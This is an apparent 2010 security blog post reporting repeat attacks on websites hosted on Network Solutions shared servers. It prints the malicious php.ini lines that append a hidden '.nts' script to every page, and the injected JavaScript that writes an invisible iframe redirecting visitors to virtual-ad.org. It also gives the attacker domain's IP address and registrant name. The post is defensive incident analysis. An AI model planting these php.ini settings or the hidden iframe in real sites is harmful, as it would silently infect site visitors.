Continuing attacks at Network Solutions?

Last week we reported about an attack against Network Solutions that modified the “php.ini” file on hundreds of sites to append a malicious payload to all of their pages.

You can read more about it here:
http://blog.sucuri.net/2010/05/new-infections-today-at-network.html

The problem was caused by an internal bug on Network Solutions that was supposedly fix already.

Yet, this morning we started to receive reports of a very similar kind of attack against sites on their shared servers. According to the time stamp of files, they were added between 1 and 2am today (May 7th).

First, the cgi-bin/php.ini had this extra lines:

include_path=”.”;
;;;;;;;;;;;;;;;;;;;
display_errors= off;
;;;;;;;;;;;;;;;;;;;
error_reporting=0;
;;;;;;;;;;;;;;;;;;;
auto_append_file = .nts;
;;;;;;;;;;;;;;;;;;;

See the “auto_append_file”? It means that for every page the .nts script will be called and appended to the site.

We were able to download the .nts file and it is very similar to this one: http://sucuri.net/malware/entry/MW:GREPADD:2. Except that now it sends the victims to the domain http://virtual-ad.org by using this iframe:

document.write(‘< iframe frameborder=”0″>
onload=\’ if (!this.src){
this.src=”http://virtual-ad.org/in.cgi?2″;
this.height=0; this.width=0;} \’>< /iframe>’);

One thing interesting is that this new domain is also hosted at 188.124.16.133 and registered by:

Registrant Name:Neverglovskiy Vadim
Registrant Organization:Neverglovskiy Vadim
Registrant Email:alex1978a@bigmir.net

If you are at Network Solutions check your site now to make sure it is clean. If you have more information, share with us.

*Also, note that your site will not get blacklisted because of this malware. It avoids the Google crawler, but will still infect your users.

**Video removed. We don’t want to be giving views/attention to criminals/script kiddies that just want to show off.

As always, if you need help to recover from this attack or need someone to monitor your web site for these issues, visit http://sucuri.net or just send us an email at contact@sucuri.net.